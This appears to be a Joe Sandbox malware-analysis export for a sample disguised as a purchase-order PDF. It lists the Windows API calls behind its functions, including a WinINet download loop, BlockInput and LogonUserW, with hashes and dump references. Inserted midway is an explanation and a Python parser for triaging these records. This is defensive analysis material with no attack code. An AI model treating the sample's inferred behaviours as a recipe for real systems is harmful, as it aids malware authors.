• CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 00436D93
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: File$CloseCreateHandleTime
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3397143404-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                                                                                                                                                                                                                                                                                                            • Instruction ID: bce1a9391340f9688fe0750810cd2cb1b104417d8b3c1e96578cdf6de8724fbd
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A4F0C83634132077E5301A69AC8DFCF276CABDAB32F20452EF741A61C083D51445977D
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: _strncmp
                                                                                                                                                                                                                                                                                                            • String ID: ACCEPT$^$h
                                                                                                                                                                                                                                                                                                            • API String ID: 909875538-4263704089
                                                                                                                                                                                                                                                                                                            • Opcode ID: adbbb77bd847cefbadd23aa8e42bde8f813033e7c46a43322acc698efb747d92
                                                                                                                                                                                                                                                                                                            • Instruction ID: 72a2cba82410d8b1d90f72ff5cad5771b474d57714a55a9933f2c727144888ce
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: adbbb77bd847cefbadd23aa8e42bde8f813033e7c46a43322acc698efb747d92
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE22A0746083818FE725CF29C48076BBBE2BFC9304F24896EE8D587351D779984ACB56
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                            • String ID: ERCP$VUUU$VUUU$VUUU
                                                                                                                                                                                                                                                                                                            • API String ID: 0-2165971703
                                                                                                                                                                                                                                                                                                            • Opcode ID: fe5f619ecbbb89e409f3ebcf557090f4afc22d0cdf4dbad8df8e547bb5c0b5b7
                                                                                                                                                                                                                                                                                                            • Instruction ID: 514654dd073cfe12bfc68f6c44a091d7a3824994b709b832431b3f3de6bbd106
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fe5f619ecbbb89e409f3ebcf557090f4afc22d0cdf4dbad8df8e547bb5c0b5b7
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5562D3716087818BE734CF18C8807ABB7E1EBC6314F154A2FE49986390E779D949CB5B
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045C9BE
                                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0045CA1B
                                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CA4A
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3541575487-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: cd42767256c3935660832567e39f7af9e021373ba4cf75ddba00705dd7020de4
                                                                                                                                                                                                                                                                                                            • Instruction ID: 18858b47483a38653cd59612877c1399ad483e9f26b014a4aa46912757e3bc7b
• Opcode Fuzzy Hash: cd42767256c3935660832567e39f7af9e021373ba4cf75ddba00705dd7020de4
• Instruction Fuzzy Hash: EC41CE756003009FC720EF79D880A9BB3E4FF89315F208A6EED698B391D775A844CB95
APIs
• GetFileAttributesW.KERNEL32(00000001,00000000), ref: 00436AEF
• FindFirstFileW.KERNEL32(00000001,?), ref: 00436B00
• FindClose.KERNEL32(00000000), ref: 00436B13
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: FileFind$AttributesCloseFirst
• String ID:
• API String ID: 48322524-0
• Opcode ID: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
• Instruction ID: 417b6d6de692ea6945bae3bf725251b28653fd5bce93257cef0f58e2a105c1b1
• Opcode Fuzzy Hash: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
• Instruction Fuzzy Hash: 23E02236804418678600AB7CAC0C4EE779CDB0A335F100B96FE38C21D0D775A9408FEA
APIs
• __time64.LIBCMT ref: 004433A2
  • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
  • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Time$FileSystem__aulldiv__time64
• String ID: rJ
• API String ID: 2893107130-1865492326
• Opcode ID: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
• Instruction ID: ebc1a5536eae3429eadb0b33e849de59894c076497330b79c1ff8485d89898ec
• Opcode Fuzzy Hash: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
• Instruction Fuzzy Hash: B721A2336205108BF321CF36CC41652B7E7EBE0314F268A6AE4A5973C5CA797906CB98
APIs
• __time64.LIBCMT ref: 004433A2
  • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
  • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Time$FileSystem__aulldiv__time64
• String ID: rJ
• API String ID: 2893107130-1865492326
• Opcode ID: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
• Instruction ID: 4b4e0c3debee0a45c2bc781276f994e79ac96c452fb6cf924f1e6ade5adf298d
• Opcode Fuzzy Hash: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
• Instruction Fuzzy Hash: E82187336345108BF321CF36CC4165277E3EBE0314B258B6AD4A5973C5CA797906CB88
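The records above are Joe Sandbox's per-function disassembly metadata: the Windows APIs each function calls with their call-site addresses, the sandbox's API ID and opcode/instruction hashes used for similarity lookups, and the memory dump the function was lifted from. The Python below is an added example, not part of the Joe Sandbox report or its tooling. It parses records in this layout into structured objects, separates a function's own calls from those made inside sub-functions, groups variants by API ID, and flags the InternetQueryDataAvailable/InternetReadFile receive loop that appears in the WININET record. The record layout the regular expressions assume is inferred only from the lines visible on this page, and the embedded sample is constructed from these same records with the Memory Dump Source, Snapshot File and fuzzy-hash lines left out.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: the four function records on this page, keeping only the
# "APIs" and "Similarity" lines; every value is copied from the report as-is.
SAMPLE = """\
APIs
• GetFileAttributesW.KERNEL32(00000001,00000000), ref: 00436AEF
• FindFirstFileW.KERNEL32(00000001,?), ref: 00436B00
• FindClose.KERNEL32(00000000), ref: 00436B13
Similarity
• API ID: FileFind$AttributesCloseFirst
• String ID:
• API String ID: 48322524-0
• Opcode ID: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
APIs
• __time64.LIBCMT ref: 004433A2
  • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
  • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
Similarity
• API ID: Time$FileSystem__aulldiv__time64
• String ID: rJ
• API String ID: 2893107130-1865492326
• Opcode ID: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
APIs
• __time64.LIBCMT ref: 004433A2
  • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
  • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
Similarity
• API ID: Time$FileSystem__aulldiv__time64
• String ID: rJ
• API String ID: 2893107130-1865492326
• Opcode ID: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
APIs
• InternetQueryDataAvailable.WININET(?,?,?,?,00000000,00000000), ref: 004428C2
• InternetReadFile.WININET(?,00000000,?,?), ref: 004428F9
  • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
Similarity
• API ID: Internet$AvailableDataErrorFileLastQueryRead
• String ID:
• API String ID: 901099227-0
• Opcode ID: 1efa27a708889211d571c3a51cb8a45fc10d59491133636c855e566be89f5e19
"""

# Layout assumed from the lines on this page; not a documented Joe Sandbox format.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+): )?"
    r"(?P<name>[A-Za-z_][\w$]*)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)$"
)
FIELD_RE = re.compile(r"^(?P<key>[A-Za-z ]+ ID):\s*(?P<value>.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    ref: int               # call-site address inside the analysed image
    args: str              # raw argument list exactly as the sandbox printed it
    parent: Optional[str]  # sub-function address when the call is indirect


@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)  # API ID, String ID, Opcode ID, ...

    def direct_calls(self):
        """The function's own calls in address order; sub-function calls excluded."""
        return sorted((c for c in self.calls if c.parent is None), key=lambda c: c.ref)


def parse_records(text):
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":  # every function record opens with this header
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None or not line.startswith("•"):
            continue
        body = line.lstrip("•").strip()
        m = API_RE.match(body)
        if m:
            current.calls.append(ApiCall(m["name"], m["module"], int(m["ref"], 16),
                                         m["args"] or "", m["parent"]))
            continue
        f = FIELD_RE.match(body)
        if f:
            current.fields[f["key"]] = f["value"]
    return records


def api_sequence(record):
    return [c.name for c in record.direct_calls()]


def find_download_loops(records):
    """Opcode IDs of functions that poll InternetQueryDataAvailable and then call
    InternetReadFile: the WinINet receive loop used to pull a response or payload."""
    hits = []
    for r in records:
        seq = api_sequence(r)
        if ("InternetQueryDataAvailable" in seq and "InternetReadFile" in seq
                and seq.index("InternetQueryDataAvailable") < seq.index("InternetReadFile")):
            hits.append(r.fields.get("Opcode ID", "?"))
    return hits


def group_by_api_id(records):
    """Group functions by the sandbox's API ID so variants with the same call set
    but different opcode hashes can be triaged once."""
    groups = {}
    for r in records:
        groups.setdefault(r.fields.get("API ID", ""), []).append(r.fields.get("Opcode ID", "?"))
    return groups
```

Pointed at the text of a full report export instead of the embedded sample, `group_by_api_id` collapses the two `__time64` variants above into one triage item, and `find_download_loops` returns the opcode hash of the receive loop so it can be pivoted on in other reports; the `direct_calls` split matters because the sandbox lists sub-function calls (GetLastError, GetSystemTimeAsFileTime) under the caller, which would otherwise inflate every function's apparent API surface.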
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • InternetQueryDataAvailable.WININET(?,?,?,?,00000000,00000000), ref: 004428C2
                                                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(?,00000000,?,?), ref: 004428F9
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Internet$AvailableDataErrorFileLastQueryRead
• String ID:
• API String ID: 901099227-0
APIs
• FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045DDA1
• FindClose.KERNEL32(00000000), ref: 0045DDDD
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID:
• String ID: 0vH$HH
• API String ID: 0-728391547
APIs
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: _memset
• String ID:
• API String ID: 2102423945-0
APIs
• DefDlgProcW.USER32(?,?,?,?,004A83D8,?), ref: 0047E22C
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Proc
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2346855178-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                                                                                                                                                                                                                                                                                            • Instruction ID: e1c03c818efbd3cbf3664a0c3e659178dbc9a05004c0f073233894ce1d713c90
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4EB1E63330602429E114916BBC88EBFBB9CD7D677BB208B7FF142C1582DB5B6425A179
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • BlockInput.USER32(00000001), ref: 0045A272
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: BlockInput
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3456056419-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                                                                                                                                                                                                                                                                                            • Instruction ID: 5d782454ef4d0180448527013755d2523f66e5fc327f68786c1d80a86620ac83
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2E04F752043019BC700EF71C545A5BB7E4AF94314F108C6EF845A7351D775AC45CB66
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 0043918E
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: LogonUser
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1244722697-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                                                                                                                                                                                                                                                                            • Instruction ID: 63114e5cfb2c4979e73f5d19eacf740c811f86df1a08bc2cb556a5e36cce81ff
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8DD0ECB52686066FD204CB24D846E2B77E9A7C4701F008A0CB196D2280C670D805CA32
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
